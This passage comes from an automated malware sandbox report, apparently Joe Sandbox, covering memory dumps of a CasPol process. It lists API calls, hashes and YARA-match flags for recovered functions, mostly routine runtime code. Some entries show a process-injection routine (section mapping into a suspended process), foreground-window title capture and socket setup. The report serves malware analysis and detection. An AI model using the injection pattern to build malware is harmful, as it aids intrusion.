• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: try_get_function
• String ID: FlsAlloc
• API String ID: 2742660187-671089009
APIs
• try_get_function.LIBVCRUNTIME ref: 10003B06
Strings
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: try_get_function
• String ID: FlsAlloc
• API String ID: 2742660187-671089009
APIs
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: GlobalMemoryStatus
• String ID: @
• API String ID: 1890195054-2766056989
APIs
  • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
• GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CodeInfoPageValid
• String ID:
• API String ID: 546120528-0
                                                                                                                                                                          • Opcode ID: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                                                                                                          • Instruction ID: 491245c4813b68437391e3e70942b885a5b84425ef1b1be509cf98dd56c33fdc
                                                                                                                                                                          • Opcode Fuzzy Hash: 747d95ecf2005c527016839393fb107aa8d78a19bbf0a74999b8906be39dfc0a
                                                                                                                                                                          • Instruction Fuzzy Hash: A05153749002469EFB208F76C8816BBBBE4FF01304F1480BFD48687251E67E994A8B99
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CodeInfoPageValid
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 546120528-0
                                                                                                                                                                          • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                                                          • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                                                                                                                                                                          • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                                                                                                                                                                          • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                            • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                                                                                                                                            • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                                                                                                                                            • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                                                                                                          • _free.LIBCMT ref: 0044F050
                                                                                                                                                                          • _free.LIBCMT ref: 0044F086
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorLast_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2991157371-0
                                                                                                                                                                          • Opcode ID: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                                                                                                                                          • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                                                                                                                                          • Opcode Fuzzy Hash: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                            • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                                                                                                                            • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                            • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                                                                                                                            • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                                                                                                                            • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                                                                                                                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                                                                          • _free.LIBCMT ref: 10006CD7
                                                                                                                                                                          • _free.LIBCMT ref: 10006D0D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorLast_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2991157371-0
                                                                                                                                                                          • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                                                          • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                                                                                                                          • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                                                                          • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                                                                                                                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2279764990-0
                                                                                                                                                                          • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                                                                                          • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                                                                                                                                          • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8,00000000), ref: 10005CA5
                                                                                                                                                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2279764990-0
                                                                                                                                                                          • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                                                          • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                                                                                                                          • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                                                          • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00446227
                                                                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap$_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1482568997-0
                                                                                                                                                                          • Opcode ID: b10fa1e8472e683284d1f6c52ed4eb802d80ccb8cfc65d6c0dd02300a023487f
                                                                                                                                                                          • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                                                                                                                                          • Opcode Fuzzy Hash: b10fa1e8472e683284d1f6c52ed4eb802d80ccb8cfc65d6c0dd02300a023487f
                                                                                                                                                                          • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 00404852
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CreateEventStartupsocket
• String ID:
• API String ID: 1953588214-0
• Opcode ID: 4d13770ae0ce35ce4dbd6fcc6f24a1261d6c2af77246669734211e402fddb5c6
• Instruction ID: d30f6c82ceabff406a890a607b6903e59214fa94f63df9469096212d3e1caec2
• Opcode Fuzzy Hash: 4d13770ae0ce35ce4dbd6fcc6f24a1261d6c2af77246669734211e402fddb5c6
• Instruction Fuzzy Hash: F90171B1408B809ED7359F28A8456967FE0AB55304F044D6EF1DA97B92D3B5A881CB18
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
• Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
• Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
• Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
APIs
• dllmain_crt_process_attach.LIBCMT ref: 10001F22
• dllmain_crt_process_detach.LIBCMT ref: 10001F35
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: dllmain_crt_process_attachdllmain_crt_process_detach
• String ID:
• API String ID: 3750050125-0
• Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
• Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
• Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
• Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
APIs
• GetForegroundWindow.USER32 ref: 0041BB49
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Window$ForegroundText
• String ID:
• API String ID: 29597999-0
• Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
• Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
• Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
• Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
APIs
  • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
• ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
• String ID:
• API String ID: 806969131-0
• Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
• Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
• Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
• Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
APIs
  • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
• ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
• String ID:
• API String ID: 806969131-0
• Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
• Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
• Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
• Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
APIs
  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
  • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
  • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
• CloseHandle.KERNEL32(004040F5), ref: 004185B9
• CloseHandle.KERNEL32(00465E84), ref: 004185C2
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
• String ID:
• API String ID: 2948481953-0
• Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
• Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
• Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
• Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
• Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
• Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
• Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
APIs
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 176396367-0
                                                                                                                                                                          • Opcode ID: de129d127ca67ea1a753d85601f70d90f750fdfe4a2104a943af0387f97755ca
                                                                                                                                                                          • Instruction ID: d045c5f40cf3cd8d18dd0e016010c764e1ae3afdbf5b32035de166f485dbb4de
                                                                                                                                                                          • Opcode Fuzzy Hash: de129d127ca67ea1a753d85601f70d90f750fdfe4a2104a943af0387f97755ca
                                                                                                                                                                          • Instruction Fuzzy Hash: 681193319002059BCB15EF66E842AEE7BB5AF54314B10403FF446672E2EF78AD15CB98
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __alldvrm
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 65215352-0
                                                                                                                                                                          • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                                                                                          • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                                                                                                                                                                          • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                                                                                          • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                                                                                                                          • Instruction ID: ef76d3429b2572ee2e16b707a9c356192af24cfd4e901c13b73aaad13af6506a
                                                                                                                                                                          • Opcode Fuzzy Hash: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                                                                                                                          • Instruction Fuzzy Hash: BEF0B431500F65ABBF222E22AC05E5B3769DB81770B14412BB914EA286CA38FC0186AC
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                                                          • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                                                                                                          • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                                                          • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                                                                                                                          APIs
                                                                                                                                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                                                                          Memory Dump Source
